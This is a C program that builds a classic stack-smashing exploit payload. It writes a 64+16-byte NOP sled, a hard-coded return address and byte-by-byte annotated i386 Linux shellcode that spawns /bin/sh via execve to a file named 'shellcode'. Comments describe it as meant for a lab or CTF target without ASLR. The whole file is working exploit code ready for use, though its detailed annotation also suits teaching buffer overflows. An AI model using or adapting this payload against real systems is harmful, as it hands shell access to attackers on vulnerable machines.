#include <stdio.h>
#include <string.h>
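/* Output file that receives the raw payload (NOP sled followed by shellcode). */
#define FILENAME "shellcode"
/*
 * Length of the NOP sled written before the payload: the target's 64-byte
 * buffer plus 16 bytes to reach the saved return address past whatever else
 * sits between the buffer and the return slot in the target's frame (other
 * locals, saved frame pointer) -- TODO confirm against the target binary.
 * The original comment mentioned "SEH handlers", which are a Windows concept;
 * the payload below is int 0x80 i386 Linux shellcode, so that does not apply.
 *
 * Parenthesised: the previous `64 + 16` expanded unguarded, so an expression
 * such as `x - BUF_SIZE` would have become `x - 64 + 16`.
 */
#define BUF_SIZE (64 + 16)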
/*
 * Payload appended after the NOP sled that main() writes: a hard-coded
 * return address followed by classic i386 Linux "jmp / call / pop" shellcode
 * that runs execve("/bin/sh", argv, envp) through int 0x80 and then exit(0).
 *
 * Byte offsets within this array:
 *    0..3   overwritten return address 0xbffff680 (stored little-endian).
 *           It must point into the NOP sled, so this only works against a
 *           fixed stack layout (no ASLR) with an executable stack -- a
 *           lab/CTF setting, not a modern default configuration.
 *    4..5   jmp +0x1f  -> lands on the `call` at offset 37
 *    6      pop esi    -> esi = address of "/bin/sh" (offset 42), pushed by
 *                         the call below; this is how the code learns its
 *                         own position without a known absolute address
 *    7..36  build the execve arguments in the scratch space after the string
 *           and issue the two syscalls (see per-line comments)
 *   37..41  call -0x24 -> back to `pop esi` at offset 6
 *   42..48  "/bin/sh" (7 bytes; NUL-terminated at run time by the code)
 *
 * i386 Linux syscall convention: eax = syscall number, ebx/ecx/edx = first
 * three arguments. None of the bytes below is 0x00, so the payload survives
 * a str*-style copy; main() also drops the string literal's trailing NUL.
 */
char shellcode[] =
{
// Opcode reference: http://sparksandflames.com/files/x86InstructionChart.html
"\x80\xf6\xff\xbf" // return address 0xbffff680 (little-endian) -> into the sled
"\xeb\x1f" // jmp +0x1f -> the `call` at offset 37
"\x5e" // pop esi -> esi = &"/bin/sh"
"\x89\x76\x08" // mov [esi + 0x8], esi   ; argv[0] = &"/bin/sh"
"\x31\xc0" // xor eax, eax           ; eax = 0
"\x88\x46\x07" // mov byte ptr [esi + 0x7], al ; NUL-terminate "/bin/sh"
"\x89\x46\x0c" // mov [esi + 0xc], eax  ; argv[1] = NULL (also used as envp)
"\xb0\x0b" // mov al, 0xb            ; eax = 11 = execve
"\x89\xf3" // mov ebx, esi           ; ebx = filename
"\x8d\x4e\x08" // lea ecx, [esi + 0x8]  ; ecx = argv
"\x8d\x56\x0c" // lea edx, [esi + 0xc]  ; edx = envp (points at the NULL)
"\xcd\x80" // int 0x80               ; execve("/bin/sh", argv, envp)
"\x31\xdb" // xor ebx, ebx           ; ebx = 0 = exit status
"\x89\xd8" // mov eax, ebx           ; eax = 0
"\x40" // inc eax                    ; eax = 1 = exit
"\xcd\x80" // int 0x80               ; exit(0) if execve failed
"\xe8\xdc\xff\xff\xff" // call -0x24 -> pop esi at offset 6, pushing &"/bin/sh"
"/bin/sh" // 7 bytes; the implicit trailing NUL is stripped by main()
};
char filler = '\x90';
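/*
 * Write the exploit payload to FILENAME: BUF_SIZE bytes of `filler` (the NOP
 * sled) followed by `shellcode` without its string-literal NUL terminator.
 * Prints the payload geometry first so the sled length can be checked
 * against the target's buffer.
 *
 * Returns 0 on success, 1 if the file could not be opened or fully written.
 */
int main(void)
{
    /* Payload bytes actually emitted: drop the implicit NUL added by the
     * string-literal initialiser, which would truncate a str*-style copy in
     * the target. */
    const size_t code_len = sizeof(shellcode) - 1;
    char buf[BUF_SIZE];
    int rc = 0;

    /* sizeof yields size_t; printing it with %d (as before) was undefined
     * behaviour and prints garbage on LP64 targets. */
    printf("sh-sz=%zu fill-sz=%zu\n", sizeof(shellcode),
           (size_t)BUF_SIZE - sizeof(shellcode));

    /* "wb": the payload is raw bytes, never subject to text-mode translation. */
    FILE *fp = fopen(FILENAME, "wb");
    if (!fp) {
        fprintf(stderr, "could not open file\n");
        return 1;
    }

    memset(buf, filler, sizeof buf);

    /* A short write would silently yield a payload that does not line up with
     * the target frame, so both writes must complete; fclose() is checked as
     * well because it flushes the buffered data to disk. */
    if (fwrite(buf, sizeof buf, 1, fp) != 1 ||
        fwrite(shellcode, code_len, 1, fp) != 1) {
        fprintf(stderr, "short write to " FILENAME "\n");
        rc = 1;
    }
    if (fclose(fp) != 0) {
        fprintf(stderr, "error closing " FILENAME "\n");
        rc = 1;
    }
    return rc;
}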